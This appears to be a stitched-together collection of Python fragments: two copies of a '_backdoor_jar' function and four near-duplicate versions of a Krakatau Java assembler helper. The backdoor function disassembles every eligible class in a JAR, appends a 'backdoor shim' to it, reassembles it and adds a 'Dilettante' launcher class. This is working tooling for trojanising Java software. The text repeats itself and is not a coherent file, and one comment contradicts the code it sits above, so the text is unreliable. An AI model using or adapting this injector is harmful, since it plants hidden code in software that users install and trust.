def _backdoor_jar(self, jar_path):
zp = zipfile.ZipFile(jar_path, "a")
count = 0
for zinfo in zp.infolist():
filename = zinfo.filename
# inject our backdoor shim into every class that's not an inner class or has a _
# to not get too crazy, we'll backdoor the first 100 classes we see and stop
# TODO: come up with a better way to speed this up
if count < 1000 and str.endswith(filename, ".class") and "$" not in filename and "_" not in filename:
data = zp.read(zinfo)
# disassemble class with Krakatau
stream = Krakatau.binUnpacker.binUnpacker(data=data)
class_ = ClassFile(stream)
class_.loadElements(keepRaw=True)
source = Krakatau.assembler.disassembler.disassemble(class_)
# don't want to overwrite the "static" method
if ".method static <clinit> : ()V" not in source and ".method static public <clinit> : ()V" not in source:
count += 1
# add backdoor and assemble again
backdoored_source = "\n" + source + self.backdoor_shim
lexer = tokenize.makeLexer(debug=False)
parser = parse.makeParser(debug=False)
parse_trees = parser.parse(backdoored_source, lexer=lexer)
backdoored_class = assembler.assemble(parse_trees[0], False, False, filename)[1]
# write backdoored class to zip
logging.debug("backdooring class" + filename)
zp.writestr(filename, backdoored_class)
zp.writestr("dilettante/Dilettante.class", self.backdoor_launcher)
zp.writestr("dilettante/sad_cat.jpg", self.image)
zp.close()
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
assembly = open(filename, 'rb').read()
lexer = tokenize.makeLexer(debug=debug)
parser = parse.makeParser(debug=debug)
parse_tree = parser.parse('\n'+assembly+'\n', lexer=lexer)
return assembler.assemble(parse_tree, makeLineNumbers, jasmode, os.path.basename(filename))
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
basename = os.path.basename(filename)
assembly = open(filename, 'rb').read()
assembly = '\n'+assembly+'\n' #parser expects newlines at beginning and end
lexer = tokenize.makeLexer(debug=debug)
parser = parse.makeParser(debug=debug)
parse_trees = parser.parse(assembly, lexer=lexer)
return parse_trees and [assembler.assemble(tree, makeLineNumbers, jasmode, basename) for tree in parse_trees]
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
basename = os.path.basename(filename)
assembly = open(filename, 'rb').read()
assembly = '\n' + assembly + '\n' #parser expects newlines at beginning and end
lexer = tokenize.makeLexer(debug=debug)
parser = parse.makeParser(debug=debug)
parse_trees = parser.parse(assembly, lexer=lexer)
return parse_trees and [
assembler.assemble(tree, makeLineNumbers, jasmode, basename)
for tree in parse_trees
]
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
basename = os.path.basename(filename)
assembly = open(filename, 'rb').read()
if assembly.startswith('\xca\xfe') or assembly.startswith('\x50\x4b\x03\x04'):
print 'Error: You appear to have passed a jar or classfile instead of an assembly file'
print 'Perhaps you meant to invoke the disassembler instead?'
return []
assembly = '\n'+assembly+'\n' #parser expects newlines at beginning and end
lexer = tokenize.makeLexer(debug=debug)
parser = parse.makeParser(debug=debug)
parse_trees = parser.parse(assembly, lexer=lexer)
return parse_trees and [assembler.assemble(tree, makeLineNumbers, jasmode, basename) for tree in parse_trees]
def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
basename = os.path.basename(filename)
assembly = open(filename, 'rb').read()
if assembly.startswith('\xca\xfe') or assembly.startswith(
'\x50\x4b\x03\x04'):
print 'Error: You appear to have passed a jar or classfile instead of an assembly file'
print 'Perhaps you meant to invoke the disassembler instead?'
return []
assembly = '\n' + assembly + '\n' #parser expects newlines at beginning and end
lexer = tokenize.makeLexer(debug=debug)
parser = parse.makeParser(debug=debug)
parse_trees = parser.parse(assembly, lexer=lexer)
return parse_trees and [
assembler.assemble(tree, makeLineNumbers, jasmode, basename)
for tree in parse_trees
]
def _backdoor_jar(self, jar_path):
zp = zipfile.ZipFile(jar_path, "a")
count = 0
for zinfo in zp.infolist():
filename = zinfo.filename
# inject our backdoor shim into every class that's not an inner class or has a _
# to not get too crazy, we'll backdoor the first 100 classes we see and stop
# TODO: come up with a better way to speed this up
if count < 1000 and str.endswith(
filename,
".class") and "$" not in filename and "_" not in filename:
data = zp.read(zinfo)
# disassemble class with Krakatau
stream = Krakatau.binUnpacker.binUnpacker(data=data)
class_ = ClassFile(stream)
class_.loadElements(keepRaw=True)
source = Krakatau.assembler.disassembler.disassemble(class_)
# don't want to overwrite the "static" method
if ".method static <clinit> : ()V" not in source and ".method static public <clinit> : ()V" not in source:
count += 1
# add backdoor and assemble again
backdoored_source = "\n" + source + self.backdoor_shim
lexer = tokenize.makeLexer(debug=False)
parser = parse.makeParser(debug=False)
parse_trees = parser.parse(backdoored_source, lexer=lexer)
backdoored_class = assembler.assemble(
parse_trees[0], False, False, filename)[1]
# write backdoored class to zip
logging.debug("backdooring class" + filename)
zp.writestr(filename, backdoored_class)
zp.writestr("dilettante/Dilettante.class", self.backdoor_launcher)
zp.writestr("dilettante/sad_cat.jpg", self.image)
zp.close()